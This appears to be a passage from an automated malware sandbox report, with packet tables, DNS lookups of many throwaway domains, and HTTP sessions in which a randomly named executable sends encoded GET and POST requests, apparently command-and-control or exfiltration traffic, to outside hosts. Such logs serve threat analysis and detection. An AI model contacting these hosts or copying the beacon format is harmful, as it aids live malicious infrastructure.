                                          Sep 7, 2024 21:45:25.422102928 CEST8056255185.134.245.113192.168.2.4
                                          Sep 7, 2024 21:45:26.060398102 CEST8056255185.134.245.113192.168.2.4
                                          Sep 7, 2024 21:45:26.060791016 CEST8056255185.134.245.113192.168.2.4
                                          Sep 7, 2024 21:45:26.061527967 CEST5625580192.168.2.4185.134.245.113
                                          Sep 7, 2024 21:45:26.926398993 CEST5625580192.168.2.4185.134.245.113
                                          Sep 7, 2024 21:45:27.946196079 CEST5625680192.168.2.4185.134.245.113
                                          Sep 7, 2024 21:45:27.951158047 CEST8056256185.134.245.113192.168.2.4
                                          Sep 7, 2024 21:45:27.951282024 CEST5625680192.168.2.4185.134.245.113
                                          Sep 7, 2024 21:45:27.962165117 CEST5625680192.168.2.4185.134.245.113
                                          Sep 7, 2024 21:45:27.968023062 CEST8056256185.134.245.113192.168.2.4
                                          Sep 7, 2024 21:45:27.968043089 CEST8056256185.134.245.113192.168.2.4
                                          Sep 7, 2024 21:45:27.968122959 CEST8056256185.134.245.113192.168.2.4
                                          Sep 7, 2024 21:45:27.968135118 CEST8056256185.134.245.113192.168.2.4
                                          Sep 7, 2024 21:45:27.968467951 CEST8056256185.134.245.113192.168.2.4
                                          Sep 7, 2024 21:45:27.968477011 CEST8056256185.134.245.113192.168.2.4
                                          Sep 7, 2024 21:45:27.968489885 CEST8056256185.134.245.113192.168.2.4
                                          Sep 7, 2024 21:45:27.968498945 CEST8056256185.134.245.113192.168.2.4
                                          Sep 7, 2024 21:45:27.968508959 CEST8056256185.134.245.113192.168.2.4
                                          Sep 7, 2024 21:45:28.586628914 CEST8056256185.134.245.113192.168.2.4
                                          Sep 7, 2024 21:45:28.592698097 CEST8056256185.134.245.113192.168.2.4
                                          Sep 7, 2024 21:45:28.592742920 CEST5625680192.168.2.4185.134.245.113
                                          Sep 7, 2024 21:45:29.473428965 CEST5625680192.168.2.4185.134.245.113
                                          Sep 7, 2024 21:45:30.493999958 CEST5625780192.168.2.4185.134.245.113
                                          Sep 7, 2024 21:45:30.498935938 CEST8056257185.134.245.113192.168.2.4
                                          Sep 7, 2024 21:45:30.499007940 CEST5625780192.168.2.4185.134.245.113
                                          Sep 7, 2024 21:45:30.509696007 CEST5625780192.168.2.4185.134.245.113
                                          Sep 7, 2024 21:45:30.514816046 CEST8056257185.134.245.113192.168.2.4
                                          Sep 7, 2024 21:45:31.255739927 CEST8056257185.134.245.113192.168.2.4
                                          Sep 7, 2024 21:45:31.255825043 CEST8056257185.134.245.113192.168.2.4
                                          Sep 7, 2024 21:45:31.255845070 CEST8056257185.134.245.113192.168.2.4
                                          Sep 7, 2024 21:45:31.255863905 CEST5625780192.168.2.4185.134.245.113
                                          Sep 7, 2024 21:45:31.256377935 CEST8056257185.134.245.113192.168.2.4
                                          Sep 7, 2024 21:45:31.256390095 CEST8056257185.134.245.113192.168.2.4
                                          Sep 7, 2024 21:45:31.256413937 CEST5625780192.168.2.4185.134.245.113
                                          Sep 7, 2024 21:45:31.256788969 CEST8056257185.134.245.113192.168.2.4
                                          Sep 7, 2024 21:45:31.256823063 CEST5625780192.168.2.4185.134.245.113
                                          Sep 7, 2024 21:45:31.259212017 CEST5625780192.168.2.4185.134.245.113
                                          Sep 7, 2024 21:45:31.264050961 CEST8056257185.134.245.113192.168.2.4
                                          Sep 7, 2024 21:45:36.596568108 CEST5625880192.168.2.4103.42.108.46
                                          Sep 7, 2024 21:45:36.601422071 CEST8056258103.42.108.46192.168.2.4
                                          Sep 7, 2024 21:45:36.601505995 CEST5625880192.168.2.4103.42.108.46
                                          Sep 7, 2024 21:45:36.620532990 CEST5625880192.168.2.4103.42.108.46
                                          Sep 7, 2024 21:45:36.625545979 CEST8056258103.42.108.46192.168.2.4
                                          Sep 7, 2024 21:45:37.494009972 CEST8056258103.42.108.46192.168.2.4
                                          Sep 7, 2024 21:45:37.494368076 CEST8056258103.42.108.46192.168.2.4
                                          Sep 7, 2024 21:45:37.497476101 CEST5625880192.168.2.4103.42.108.46
                                          Sep 7, 2024 21:45:38.133399010 CEST5625880192.168.2.4103.42.108.46
                                          Sep 7, 2024 21:45:39.162012100 CEST5625980192.168.2.4103.42.108.46
                                          Sep 7, 2024 21:45:39.913235903 CEST8056259103.42.108.46192.168.2.4
                                          Sep 7, 2024 21:45:39.913636923 CEST5625980192.168.2.4103.42.108.46
                                          Sep 7, 2024 21:45:39.925390959 CEST5625980192.168.2.4103.42.108.46
                                          Sep 7, 2024 21:45:39.930403948 CEST8056259103.42.108.46192.168.2.4
                                          Sep 7, 2024 21:45:40.787250996 CEST8056259103.42.108.46192.168.2.4
                                          Sep 7, 2024 21:45:40.787278891 CEST8056259103.42.108.46192.168.2.4
                                          Sep 7, 2024 21:45:40.787322998 CEST5625980192.168.2.4103.42.108.46
                                          Sep 7, 2024 21:45:41.429406881 CEST5625980192.168.2.4103.42.108.46
                                          Sep 7, 2024 21:45:42.446944952 CEST5626080192.168.2.4103.42.108.46
                                          Sep 7, 2024 21:45:42.451906919 CEST8056260103.42.108.46192.168.2.4
                                          Sep 7, 2024 21:45:42.451981068 CEST5626080192.168.2.4103.42.108.46
                                          Sep 7, 2024 21:45:42.468739986 CEST5626080192.168.2.4103.42.108.46
                                          Sep 7, 2024 21:45:42.473613024 CEST8056260103.42.108.46192.168.2.4
                                          Sep 7, 2024 21:45:42.473654985 CEST8056260103.42.108.46192.168.2.4
                                          Sep 7, 2024 21:45:42.473664045 CEST8056260103.42.108.46192.168.2.4
                                          Sep 7, 2024 21:45:42.473754883 CEST8056260103.42.108.46192.168.2.4
                                          Sep 7, 2024 21:45:42.473763943 CEST8056260103.42.108.46192.168.2.4
                                          Sep 7, 2024 21:45:42.473876953 CEST8056260103.42.108.46192.168.2.4
                                          Sep 7, 2024 21:45:42.473886967 CEST8056260103.42.108.46192.168.2.4
                                          Sep 7, 2024 21:45:42.473942995 CEST8056260103.42.108.46192.168.2.4
                                          Sep 7, 2024 21:45:42.473952055 CEST8056260103.42.108.46192.168.2.4
                                          Sep 7, 2024 21:45:43.320790052 CEST8056260103.42.108.46192.168.2.4
                                          Sep 7, 2024 21:45:43.320938110 CEST8056260103.42.108.46192.168.2.4
                                          Sep 7, 2024 21:45:43.323564053 CEST5626080192.168.2.4103.42.108.46
                                          Sep 7, 2024 21:45:43.973251104 CEST5626080192.168.2.4103.42.108.46
                                          Sep 7, 2024 21:45:44.995500088 CEST5626180192.168.2.4103.42.108.46
                                          Sep 7, 2024 21:45:45.002382994 CEST8056261103.42.108.46192.168.2.4
                                          Sep 7, 2024 21:45:45.002465963 CEST5626180192.168.2.4103.42.108.46
                                          Sep 7, 2024 21:45:45.012057066 CEST5626180192.168.2.4103.42.108.46
                                          Sep 7, 2024 21:45:45.016987085 CEST8056261103.42.108.46192.168.2.4
                                          Sep 7, 2024 21:45:45.913885117 CEST8056261103.42.108.46192.168.2.4
                                          Sep 7, 2024 21:45:45.914282084 CEST8056261103.42.108.46192.168.2.4
                                          Sep 7, 2024 21:45:45.914448023 CEST5626180192.168.2.4103.42.108.46
                                          Sep 7, 2024 21:45:45.917409897 CEST5626180192.168.2.4103.42.108.46
                                          Sep 7, 2024 21:45:45.922249079 CEST8056261103.42.108.46192.168.2.4

                                          UDP Packets

                                          TimestampSource PortDest PortSource IPDest IP
                                          Sep 7, 2024 21:43:04.044174910 CEST53647071.1.1.1192.168.2.4
                                          Sep 7, 2024 21:43:34.204176903 CEST6541153192.168.2.41.1.1.1
                                          Sep 7, 2024 21:43:35.191869974 CEST6541153192.168.2.41.1.1.1
                                          Sep 7, 2024 21:43:35.532731056 CEST53654111.1.1.1192.168.2.4
                                          Sep 7, 2024 21:43:35.532759905 CEST53654111.1.1.1192.168.2.4
                                          Sep 7, 2024 21:43:51.273336887 CEST5702053192.168.2.41.1.1.1
                                          Sep 7, 2024 21:43:51.286057949 CEST53570201.1.1.1192.168.2.4
                                          Sep 7, 2024 21:43:59.351669073 CEST5445453192.168.2.41.1.1.1
                                          Sep 7, 2024 21:43:59.371408939 CEST53544541.1.1.1192.168.2.4
                                          Sep 7, 2024 21:44:12.716047049 CEST5240253192.168.2.41.1.1.1
                                          Sep 7, 2024 21:44:12.905616045 CEST53524021.1.1.1192.168.2.4
                                          Sep 7, 2024 21:44:26.273284912 CEST5743753192.168.2.41.1.1.1
                                          Sep 7, 2024 21:44:26.705341101 CEST53574371.1.1.1192.168.2.4
                                          Sep 7, 2024 21:44:40.290380955 CEST5678353192.168.2.41.1.1.1
                                          Sep 7, 2024 21:44:40.740897894 CEST53567831.1.1.1192.168.2.4
                                          Sep 7, 2024 21:44:54.135387897 CEST6043453192.168.2.41.1.1.1
                                          Sep 7, 2024 21:44:54.569549084 CEST53604341.1.1.1192.168.2.4
                                          Sep 7, 2024 21:45:07.717387915 CEST5404053192.168.2.41.1.1.1
                                          Sep 7, 2024 21:45:07.731180906 CEST53540401.1.1.1192.168.2.4
                                          Sep 7, 2024 21:45:21.821394920 CEST5006053192.168.2.41.1.1.1
                                          Sep 7, 2024 21:45:22.817466021 CEST5006053192.168.2.41.1.1.1
                                          Sep 7, 2024 21:45:22.843759060 CEST53500601.1.1.1192.168.2.4
                                          Sep 7, 2024 21:45:22.847618103 CEST53500601.1.1.1192.168.2.4
                                          Sep 7, 2024 21:45:36.277404070 CEST6306353192.168.2.41.1.1.1
                                          Sep 7, 2024 21:45:36.593625069 CEST53630631.1.1.1192.168.2.4
                                          Sep 7, 2024 21:45:51.461513996 CEST6028353192.168.2.41.1.1.1
                                          Sep 7, 2024 21:45:51.473531961 CEST53602831.1.1.1192.168.2.4

                                          DNS Queries

                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                          Sep 7, 2024 21:43:34.204176903 CEST192.168.2.41.1.1.10x75afStandard query (0)www.nosr.netA (IP address)IN (0x0001)false
                                          Sep 7, 2024 21:43:35.191869974 CEST192.168.2.41.1.1.10x75afStandard query (0)www.nosr.netA (IP address)IN (0x0001)false
                                          Sep 7, 2024 21:43:51.273336887 CEST192.168.2.41.1.1.10x65f4Standard query (0)www.monos.shopA (IP address)IN (0x0001)false
                                          Sep 7, 2024 21:43:59.351669073 CEST192.168.2.41.1.1.10xa4d7Standard query (0)www.complexity.pubA (IP address)IN (0x0001)false
                                          Sep 7, 2024 21:44:12.716047049 CEST192.168.2.41.1.1.10x21ecStandard query (0)www.nevsehir-nakliyat.xyzA (IP address)IN (0x0001)false
                                          Sep 7, 2024 21:44:26.273284912 CEST192.168.2.41.1.1.10xf5Standard query (0)www.masteriocp.onlineA (IP address)IN (0x0001)false
                                          Sep 7, 2024 21:44:40.290380955 CEST192.168.2.41.1.1.10xb825Standard query (0)www.kryto.topA (IP address)IN (0x0001)false
                                          Sep 7, 2024 21:44:54.135387897 CEST192.168.2.41.1.1.10xd8afStandard query (0)www.angelenterprise.bizA (IP address)IN (0x0001)false
                                          Sep 7, 2024 21:45:07.717387915 CEST192.168.2.41.1.1.10x8313Standard query (0)www.dyme.techA (IP address)IN (0x0001)false
                                          Sep 7, 2024 21:45:21.821394920 CEST192.168.2.41.1.1.10xe999Standard query (0)www.lilibetmed.onlineA (IP address)IN (0x0001)false
                                          Sep 7, 2024 21:45:22.817466021 CEST192.168.2.41.1.1.10xe999Standard query (0)www.lilibetmed.onlineA (IP address)IN (0x0001)false
                                          Sep 7, 2024 21:45:36.277404070 CEST192.168.2.41.1.1.10x72c5Standard query (0)www.mbwd.storeA (IP address)IN (0x0001)false
                                          Sep 7, 2024 21:45:51.461513996 CEST192.168.2.41.1.1.10x343dStandard query (0)www.terrearcenciel.onlineA (IP address)IN (0x0001)false

                                          DNS Answers

                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                          Sep 7, 2024 21:43:35.532731056 CEST1.1.1.1192.168.2.40x75afNo error (0)www.nosr.netnosr.netCNAME (Canonical name)IN (0x0001)false
                                          Sep 7, 2024 21:43:35.532731056 CEST1.1.1.1192.168.2.40x75afNo error (0)nosr.net82.221.128.183A (IP address)IN (0x0001)false
                                          Sep 7, 2024 21:43:35.532759905 CEST1.1.1.1192.168.2.40x75afNo error (0)www.nosr.netnosr.netCNAME (Canonical name)IN (0x0001)false
                                          Sep 7, 2024 21:43:35.532759905 CEST1.1.1.1192.168.2.40x75afNo error (0)nosr.net82.221.128.183A (IP address)IN (0x0001)false
                                          Sep 7, 2024 21:43:51.286057949 CEST1.1.1.1192.168.2.40x65f4Name error (3)www.monos.shopnonenoneA (IP address)IN (0x0001)false
                                          Sep 7, 2024 21:43:59.371408939 CEST1.1.1.1192.168.2.40xa4d7No error (0)www.complexity.pub217.160.0.127A (IP address)IN (0x0001)false
                                          Sep 7, 2024 21:44:12.905616045 CEST1.1.1.1192.168.2.40x21ecNo error (0)www.nevsehir-nakliyat.xyzredirect.natrocdn.comCNAME (Canonical name)IN (0x0001)false
                                          Sep 7, 2024 21:44:12.905616045 CEST1.1.1.1192.168.2.40x21ecNo error (0)redirect.natrocdn.comnatroredirect.natrocdn.comCNAME (Canonical name)IN (0x0001)false
                                          Sep 7, 2024 21:44:12.905616045 CEST1.1.1.1192.168.2.40x21ecNo error (0)natroredirect.natrocdn.com85.159.66.93A (IP address)IN (0x0001)false
                                          Sep 7, 2024 21:44:26.705341101 CEST1.1.1.1192.168.2.40xf5No error (0)www.masteriocp.onlinedns.ladipage.comCNAME (Canonical name)IN (0x0001)false
                                          Sep 7, 2024 21:44:26.705341101 CEST1.1.1.1192.168.2.40xf5No error (0)dns.ladipage.com18.139.62.226A (IP address)IN (0x0001)false
                                          Sep 7, 2024 21:44:26.705341101 CEST1.1.1.1192.168.2.40xf5No error (0)dns.ladipage.com54.179.173.60A (IP address)IN (0x0001)false
                                          Sep 7, 2024 21:44:26.705341101 CEST1.1.1.1192.168.2.40xf5No error (0)dns.ladipage.com13.228.81.39A (IP address)IN (0x0001)false
                                          Sep 7, 2024 21:44:40.740897894 CEST1.1.1.1192.168.2.40xb825No error (0)www.kryto.top162.0.213.94A (IP address)IN (0x0001)false
                                          Sep 7, 2024 21:44:54.569549084 CEST1.1.1.1192.168.2.40xd8afNo error (0)www.angelenterprise.bizangelenterprise.bizCNAME (Canonical name)IN (0x0001)false
                                          Sep 7, 2024 21:44:54.569549084 CEST1.1.1.1192.168.2.40xd8afNo error (0)angelenterprise.biz3.33.130.190A (IP address)IN (0x0001)false
                                          Sep 7, 2024 21:44:54.569549084 CEST1.1.1.1192.168.2.40xd8afNo error (0)angelenterprise.biz15.197.148.33A (IP address)IN (0x0001)false
                                          Sep 7, 2024 21:45:07.731180906 CEST1.1.1.1192.168.2.40x8313No error (0)www.dyme.tech13.248.169.48A (IP address)IN (0x0001)false
                                          Sep 7, 2024 21:45:07.731180906 CEST1.1.1.1192.168.2.40x8313No error (0)www.dyme.tech76.223.54.146A (IP address)IN (0x0001)false
                                          Sep 7, 2024 21:45:22.843759060 CEST1.1.1.1192.168.2.40xe999No error (0)www.lilibetmed.online185.134.245.113A (IP address)IN (0x0001)false
                                          Sep 7, 2024 21:45:22.847618103 CEST1.1.1.1192.168.2.40xe999No error (0)www.lilibetmed.online185.134.245.113A (IP address)IN (0x0001)false
                                          Sep 7, 2024 21:45:36.593625069 CEST1.1.1.1192.168.2.40x72c5No error (0)www.mbwd.store103.42.108.46A (IP address)IN (0x0001)false
                                          Sep 7, 2024 21:45:51.473531961 CEST1.1.1.1192.168.2.40x343dName error (3)www.terrearcenciel.onlinenonenoneA (IP address)IN (0x0001)false

                                          HTTP Request Dependency Graph

                                          • www.nosr.net
                                          • www.complexity.pub
                                          • www.nevsehir-nakliyat.xyz
                                          • www.masteriocp.online
                                          • www.kryto.top
                                          • www.angelenterprise.biz
                                          • www.dyme.tech
                                          • www.lilibetmed.online
                                          • www.mbwd.store

                                          HTTP Packets

                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          0192.168.2.45622882.221.128.183804520C:\Program Files (x86)\tCOcyHxoqsCoNIjtuwUUsZaeMdUgQPXlWOiIwEbnrUekxqujRdCpkqIhnVlDIOxFeLCdbqSIeKhwe\uspEUeZyrqFDmi.exe
                                          TimestampBytes transferredDirectionData
                                          Sep 7, 2024 21:43:35.553037882 CEST497OUTGET /ujbu/?GtLD=xFGdQ6FH&dxWljT6=MTTknThtRCJj0AT/2nqFymBldeCJp6XfOmsto+GOgM7INhQU0fKKD5oUBTZzolSVFZTYJ8HdpMRBL7zARboLl6MWH88cVp441dEYiiIl3QDYLx1FQH1mC88= HTTP/1.1
                                          Host: www.nosr.net
                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                          Accept-Language: en-US,en;q=0.5
                                          Connection: close
                                          User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; GT-P5200 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.78 Safari/537.36 OPR/30.0.1856.95530
                                          Sep 7, 2024 21:43:36.228411913 CEST1236INHTTP/1.1 404 Not Found
                                          Date: Sat, 07 Sep 2024 19:43:32 GMT
                                          Server: Apache
                                          Accept-Ranges: bytes
                                          Cache-Control: no-cache, no-store, must-revalidate
                                          Pragma: no-cache
                                          Expires: 0
                                          Connection: close
                                          Transfer-Encoding: chunked
                                          Content-Type: text/html
                                          Data Raw: 31 0d 0a 0a 0d 0a 31 0d 0a 0a 0d 0a 31 0d 0a 0a 0d 0a 31 35 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 6e 74 3d 22 30 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 [TRUNCATED]
                                          Data Ascii: 111157<!DOCTYPE html><html> <head> <meta http-equiv="Content-type" content="text/html; charset=utf-8"> <meta http-equiv="Cache-control" content="no-cache"> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="Expires" content="0"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>34041 9Not Found1fca</title> <style type="text/css"> body { font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 1.428571429; background-color: #ffffff; color: #2F3230; padding: 0; margin: 0; } section, footer { display: block; padding: 0; margin: 0; } .container { margin-left: auto; margin-right: auto; padding: 0 10px; } .response-info { color: #CC
                                          Sep 7, 2024 21:43:36.228441000 CEST1236INData Raw: 43 43 43 43 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 73 74 61 74 75 73 2d 63 6f 64 65 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 35 30 30 25 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20
                                          Data Ascii: CCCC; } .status-code { font-size: 500%; } .status-reason { font-size: 250%; display: block; } .contact-info, .reason-text { color: #000000;
                                          Sep 7, 2024 21:43:36.228454113 CEST1236INData Raw: 69 74 69 6f 6e 61 6c 2d 69 6e 66 6f 2d 69 74 65 6d 73 20 75 6c 20 6c 69 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 69 6e 66 6f 2d 69 6d 61 67 65 20
                                          Data Ascii: itional-info-items ul li { width: 100%; } .info-image { padding: 10px; } .info-heading { font-weight: bold; text-align: left; word-break: break-all;
                                          Sep 7, 2024 21:43:36.229028940 CEST1236INData Raw: 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 38 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 63 74 2d 69 6e 66 6f 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                          Data Ascii: font-size: 18px; } .contact-info { font-size: 18px; } .info-image { float: left; } .info-heading { margin: 62px 0
                                          Sep 7, 2024 21:43:36.229041100 CEST1236INData Raw: 4e 50 78 46 6b 62 2b 43 45 59 68 48 43 66 6d 4a 36 44 51 53 68 66 45 47 66 4d 74 37 31 46 4f 50 67 70 45 31 50 48 4f 4d 54 45 59 38 6f 5a 33 79 43 72 32 55 74 69 49 6e 71 45 66 74 6a 33 69 4c 4d 31 38 41 66 73 75 2f 78 4b 76 39 42 34 51 55 7a 73
                                          Data Ascii: NPxFkb+CEYhHCfmJ6DQShfEGfMt71FOPgpE1PHOMTEY8oZ3yCr2UtiInqEftj3iLM18Afsu/xKv9B4QUzsV1XKFTzDPG+LfoLpE/LjJnzO08QCAugLalKeqP/mEmW6Qj+BPIE7IYmTyw1MFwbaksaybSxDCA4STF+wg8rH7EzMwqNibY38mlvXKDdU5pDH3TRkl40vxJkZ+DO2Nu/3HnyC7t15obGBtqRFRXo6+0Z5YQh5LHd9Y
                                          Sep 7, 2024 21:43:36.229847908 CEST1120INData Raw: 4d 78 77 72 73 65 38 58 73 54 61 4d 6f 52 49 6f 43 61 5a 6d 67 33 42 51 67 4c 71 72 48 56 43 42 75 33 71 68 57 33 2b 41 41 4f 68 77 70 35 32 51 49 41 66 51 6b 41 77 6f 44 48 4b 7a 66 4e 45 59 63 6b 34 5a 50 70 35 71 68 35 43 70 34 56 46 69 4c 38
                                          Data Ascii: Mxwrse8XsTaMoRIoCaZmg3BQgLqrHVCBu3qhW3+AAOhwp52QIAfQkAwoDHKzfNEYck4ZPp5qh5Cp4VFiL8WM/Cl8SF4pgthvtHm4qQUIiQdY+5NMfu/228Pkq3NZNMqD1W7rMnrwJeQEmIwKsacMI/TVOLlHjQjM1YVtVQ3RwhvORo3ckiQ5ZOUzlCOMyi9Z+LXREhS5iqrI4QnuNlf8oVEbK8A556QQK0LNrTj2tiWfcFnh0hP
                                          Sep 7, 2024 21:43:36.229860067 CEST1236INData Raw: 47 69 56 6e 39 59 4e 66 38 62 46 42 64 34 52 55 52 46 6c 57 7a 42 76 79 42 45 71 49 69 34 49 39 61 6b 79 2b 32 72 32 39 35 39 37 2f 5a 44 36 32 2b 78 4b 56 66 42 74 4e 4d 36 71 61 48 52 47 36 31 65 72 58 50 42 4f 66 4f 36 48 4e 37 55 59 6c 4a 6d
                                          Data Ascii: GiVn9YNf8bFBd4RURFlWzBvyBEqIi4I9aky+2r29597/ZD62+xKVfBtNM6qaHRG61erXPBOfO6HN7UYlJmuslpWDUTdYab4L2z1v40hPPBvwzqOluTvhDBVB2a4Iyx/4UxLrx8goycW0UEgO4y2L3H+Ul5XI/4voc6rZkA3Bpv3njfS/nhR781E54N6t4OeWxQxuknguJ1S84ARR4RwAqtmaCFZnRiL2lbM+HaAC5npq+IwF+6h
                                          Sep 7, 2024 21:43:36.229871035 CEST261INData Raw: 39 30 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 2e 73 74 61 74 75 73 2d 72 65 61 73 6f 6e 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 34 35 30 25 3b 0a
                                          Data Ascii: 900%; } .status-reason { font-size: 450%; } } </style> </head> <body> <div class="container"> <secion class="response-info"> <span clas
                                          Sep 7, 2024 21:43:36.230442047 CEST1236INData Raw: 33 37 0d 0a 34 30 34 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 73 74 61 74 75 73 2d 72 65 61 73 6f 6e 22 3e 0d 0a 38 38 0d 0a 4e 6f 74 20 46 6f 75 6e 64 3c 2f 73 70 61 6e 3e 0a
                                          Data Ascii: 37404</span> <span class="status-reason">88Not Found</span> </section> <section class="contact-info"> Please forward this error screen to 1fwww.nosr.net's <a href="mailto:32
                                          Sep 7, 2024 21:43:36.230453968 CEST729INData Raw: 6d 43 38 38 3d 20 28 70 6f 72 74 20 0d 0a 32 0d 0a 38 30 0d 0a 37 33 0d 0a 29 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                          Data Ascii: mC88= (port 28073) </div> </li> <li class="info-server">107</li> </ul> </div> </div> </section>


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          1192.168.2.456230217.160.0.127804520C:\Program Files (x86)\tCOcyHxoqsCoNIjtuwUUsZaeMdUgQPXlWOiIwEbnrUekxqujRdCpkqIhnVlDIOxFeLCdbqSIeKhwe\uspEUeZyrqFDmi.exe
                                          TimestampBytes transferredDirectionData
                                          Sep 7, 2024 21:43:59.388808012 CEST773OUTPOST /4c7j/ HTTP/1.1
                                          Host: www.complexity.pub
                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                          Accept-Encoding: gzip, deflate, br
                                          Accept-Language: en-US,en;q=0.5
                                          Content-Length: 204
                                          Connection: close
                                          Cache-Control: no-cache
                                          Content-Type: application/x-www-form-urlencoded
                                          Origin: http://www.complexity.pub
                                          Referer: http://www.complexity.pub/4c7j/
                                          User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; GT-P5200 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.78 Safari/537.36 OPR/30.0.1856.95530
                                          Data Raw: 64 78 57 6c 6a 54 36 3d 73 70 73 6e 35 38 38 54 47 41 6b 46 6e 77 30 41 31 53 68 69 73 6e 76 6f 56 6e 56 67 38 32 55 30 36 34 55 31 46 35 65 5a 46 41 47 75 44 78 78 53 6c 43 6c 54 48 5a 61 6f 35 6c 63 69 48 39 4a 54 49 69 6f 76 64 72 6d 64 77 55 79 31 6c 47 6c 6c 38 30 71 37 32 30 5a 68 70 4d 61 6f 69 50 6b 50 31 4e 48 73 41 39 58 42 4b 62 43 76 71 59 2f 78 78 46 33 49 51 68 4e 37 2b 5a 45 64 73 42 51 2b 38 2b 6c 79 41 7a 35 71 45 44 4a 4f 73 48 72 38 4a 52 66 63 52 70 50 4f 33 33 68 6e 4e 52 49 35 44 4c 41 77 52 66 78 61 6d 63 7a 71 61 4b 51 64 6f 2f 4c 36 73 31 6c 36 58 59 75 57 71 69 53 6b 4d 41 3d 3d
                                          Data Ascii: dxWljT6=spsn588TGAkFnw0A1ShisnvoVnVg82U064U1F5eZFAGuDxxSlClTHZao5lciH9JTIiovdrmdwUy1lGll80q720ZhpMaoiPkP1NHsA9XBKbCvqY/xxF3IQhN7+ZEdsBQ+8+lyAz5qEDJOsHr8JRfcRpPO33hnNRI5DLAwRfxamczqaKQdo/L6s1l6XYuWqiSkMA==
                                          Sep 7, 2024 21:44:00.021413088 CEST558INHTTP/1.1 404 Not Found
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: close
                                          Date: Sat, 07 Sep 2024 19:43:59 GMT
                                          Server: Apache
                                          Content-Encoding: gzip
